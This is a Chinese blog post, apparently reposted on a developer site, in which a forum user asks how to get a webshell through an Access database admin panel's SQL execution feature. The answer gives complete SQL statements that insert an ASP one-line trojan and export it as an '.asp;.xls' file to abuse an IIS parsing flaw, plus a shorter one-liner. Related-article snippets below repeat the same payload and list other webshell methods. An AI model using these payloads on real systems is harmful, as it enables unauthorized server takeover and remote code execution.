ACCESS数据库后台sql语句执行导shell

最新推荐文章于 2021-01-18 14:49:59 发布
最新推荐文章于 2021-01-18 14:49:59 发布
阅读量762 收藏
点赞数
分类专栏: 脚本

问:
一个垃圾论坛,access数据库,无其他可利用之处,不过有个sql语句执行功能,绝对路径也知道,小弟对sql语句不懂,记得如果是mysql数据库root权限可以导出SHELL,这个是否也能导出shell呢?需要什么条件,语句又是什么?网上翻不到资料。麻烦各位。
答:
create table cmd (a varchar(50))
insert into cmd (a) values (<%execute request("a")%>)
select * into [a] in f:hostqhdyxtweba.asp;.xls excel 4.0; from cmd
drop table cmd
解释如下:
1.create table a (a varchar(50)) 建立一个有一个A字段的表 表名为a 字段类型为字符 长度为50
2.insert into a (a) values (<%execute request("a")%>) 在表a的a字段插入密码为a的一句话木马
3.select * into [a] in F:jtworka.asp;.xls excel 4.0; from a 把表a的内容导出为物理路径的一个
EXCEL文件,为什么用excel文件,因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的小马了。很*的说~~
4.drop table a 丢家伙闪人 射完就走!

小弟的提问,没两分钟大家就回答了,强烈顶t00ls牛淫。
这个更简单:
Access利用后台SQL执行命令功能导出WebShell:
SELECT <%execute request("a")%> into [vote] in d:webx.asp;.xls excel 8.0; from vote
后台提供SQL执行功能且知道绝对路径方可使用(vote为已知表段)
本文来源于:逍遥复仇 http://www.cqzh.cn/ 

kuxing100
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据库命令执行Getshell
m0_53087192的博客
01-19 918
AccessAccess出xxx等文件需要配合解析漏洞 create table cmd (a varchar(50)); insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%> select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd drop table cmd 菜刀直连https://www.xxx.c
Access出一句话拿shell实战
收集盒 Book box
08-30 1516
目标站:http://www.xxxx.com 我艹,开头太简单了,直接啊D搞定一切,就连TM的管理员md5还那么弱智,让我跑出来了,囸!直接进后台: 看到数据库备份我笑了,哈哈哈!老方法本地备份突破下,结果发现丫的不行!目录是只读的。 不过
access实例_详解7个shell脚本实例,值得收藏练习
weixin_39609822的博客
11-24 767
概述看多shell脚本实例自然就会有shell脚本的编写思路了,所以我一般比较推荐看脚本实例来练习shell脚本。下面分享几个shell脚本实例。1、监测Nginx访问日志502情况,并做相应动作假设服务器环境为lnmp,近期访问经常出现502现象,且502错误在重启php-fpm服务后消失,因此需要编写监控脚本,一旦出现502,则自动重启php-fpm服务。#场景:#1.访问日志文件的路径:/d...
ACCESS出一句话SHELL
asli33的专栏
08-14 392
1.create table cmd (a varchar(50)) 2.insert into cmd (a) values (‘’) 3.select * into [a] in ‘C:\\www.tmdsb.com\\tmdsb.asa;.xls’ ‘excel 4.0;’ from cmd (把表cmd的内容出为物理路径的一个EXCEL文件) 4.drop table cmd
Access数据库防注入系统拿实战shell(思路笔记)
来到了学渣的博客
04-05 1702
偶尔实战会碰到如下画面,但其实是有方法的。 例子示范: 尝试判断注入,出现防注入系统 而一般数据会记录到sqlin.asp这个页面中 尝试插入一句话马子,把马子url转码一下再传 如图所示 菜刀连接 xxx.xxx.xxx.xxx/sqlin.asp ...
Access环境下使用PowerShell执行SQL命令
weixin_33908217的博客
08-22 646
要使用数据就要先连接上数据库,连接Access的方式有好几种,我现在使用的是Oledb连接方式。其中又分为无密码和有密码。 无密码连接文本:Provider=Microsoft.ACE.OLEDB.12.0;Data Source=myAccessFile.accdb;Persist Security Info=False;有密码连接文本:Provider=Microsoft.ACE.OLEDB....
SQLSERVER远程访问Access数据库
04-01
"SQLSERVER 远程访问 Access 数据库" SQLSERVER 远程访问 Access 数据库是指使用 SQLSERVER 连接和操作远程的 Access 数据库。这个技术可以帮助开发者和数据库管理员更方便地管理和维护分布式的数据库系统。在本文...
SQL语句出大全.doc
09-25
本文档旨在提供一个全面的SQL语句出大全,涵盖了与不同数据库和文件的数据出,包括Excel、文本文件、dBase IV、dBase III、FoxPro数据库Access等。 1. 出到Excel 使用以下SQL语句可以将数据出到...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 ...手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍,涵盖了注入原理、实战心得、判断数据库类型、常用内置函数使用、数据库的扩展存储过程等方面的内容。
Access和SQLSever注入
05-07
为了防止SQL注入,开发者应确保对所有用户输入进行严格的过滤和转义,使用预编译的SQL语句,以及实施最小权限原则,限制数据库用户的操作范围。同时,定期更新数据库管理系统,修补已知的安全漏洞,也是非常重要的...
sql注入的思维图。
04-19
* 高权限:可以读写文件、执行命令、注册表读取、获取shell等。 * 低权限:可以获取数据库记录信息、查询表、列、值等。 回显与盲注 SQL注入可以通过回显和盲注来获取数据库信息: * 回显:通过查询结果来获取...
Cookie注入漏洞 + 数据库备份getshell——漏洞复现
W小哥
01-05 1577
一、环境搭建 网站源码在我的资源中,是:南方数据企业网站管理系统,下载后,使用iis平台搭建 二、漏洞复现 假设我们通过网站的sql注入漏洞,注入出用户名admin、密码admin123,登录网站后台如下图所示: ...
Access库利用后台SQL执行出webshell渗透
weixin_30663471的博客
04-27 136
今天渗透了一个站点,后台有能执行sql语句的地方,恰好又得到了网站物理路径。以前看到网上有用accessshell的方法,原理大致和php网站的outfile差不多先将一句话写到数据库中,然后再通过语句写到文件中。这里要将数据表内容出到一个EXCEL文件中,因为ACCESS数据库不允许出其他危险格式。我们出为EXCEL后再利用IIS解析漏洞就可以用客户端连接了需要执行如下操作...
各种Getshell姿势总结
m0_53087192的博客
01-18 1441
一、进后台getshell 正常上传文件 直接上传一句话木马。 修改网站上传类型Getshell 修改网站上传类型,后台设置中添aasps|asp|php|jsp|aspx|asa|cer,保存后上传aasps文件,上传后为asp文件可以解析Getshll。 后台数据库备份Getshell 后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通
第二十一天 getshell
weixin_46653764的博客
06-26 342
(1)直接上传拿shell 如果知道网站是用什么cms,但网站后台改了目录,很难去通过扫目录来获取后台地址,那这时就可以通过谷歌语法↓(这里拿织梦cms来做比喻–>织梦默认后台路径是/dede/login.php,通常者都会被管理员改掉的) 可以这样:inurl:(你要查的url) intext:powered by dedecms(这是dedecms在后台管理登录界面的关键词,虽然这里没写全) 知道后台地址后,就尝试弱口令爆破,爆不了只能想其他法子 这里假设已经登进了后台,像织梦cms,进入了后
一组在Unix下编写 shell 和 Informix dbaccess 编程的工具
EngineXiao的专栏
02-25 3216
shell 是 Unix 环境下的主要编程工具之一,一般来说,可以用shell解决的问题就用shell,不行就用awk再不行才用C。而且 shell 是脚本文件,一般来说在不同品牌的 Unix 中都可以运行,不象C要重新编译,可见 shell 是 Unix 系统管理及编程的重要工具。 不过 shell 中虽然可以自定义函数,但不能象C那样通过 include 语句引用其他文件中函数库,因此代码可读
ACCESS高级注入教程
广外女生官方BLOG
09-15 1370
 现在我们在脚本注入攻击的技术中,常用的手法分好多种,最普通的是利用子查询或者是Union联合查询来取得一些特殊表中的内容,比如Admin,Log表等等,这是一种纯粹的对数据库的攻击方式,而MSSQL Server的方法则更为多样和复杂, 当我们取得连接权限较高的注入点的时候,我们可以利用MSSQL Server本身所带的扩展来执行命令,或者是获取目录,读取文件与修改注册表;在低权用户的连接中,我
getshell方法总结
tell_me_404的博客
03-09 3699
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 ...
SQL注入基础
huike008的博客
08-01 58
简单判定有无漏洞: 粗略型:提交单引号’ 逻辑型(数字型注入):and 1=1/and 1=2 逻辑型(字符型注入):’ and ‘1’=’1/’ and ‘1’=’2 逻辑型(搜索型注入):%’ and 1=1 and ‘%’=’%/%’ and 1=2 and ‘%’=’% 简单判断数据库信息: 粗略型: 加单引号’(根据服务器报错的信息来判断) 加;–(;表示分离,– 则是注释符...
ACCESS数据库常用SQL语句.doc
06-02
对于ACCESS数据库的常用SQL语句,我们可以总结如下: ACCESS数据库是一种常用的关系型数据库管理系统,为了更好地对数据库进行操作和管理,我们需要利用SQL语句来实现数据的增删改查等操作。在ACCESS数据库中,常用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值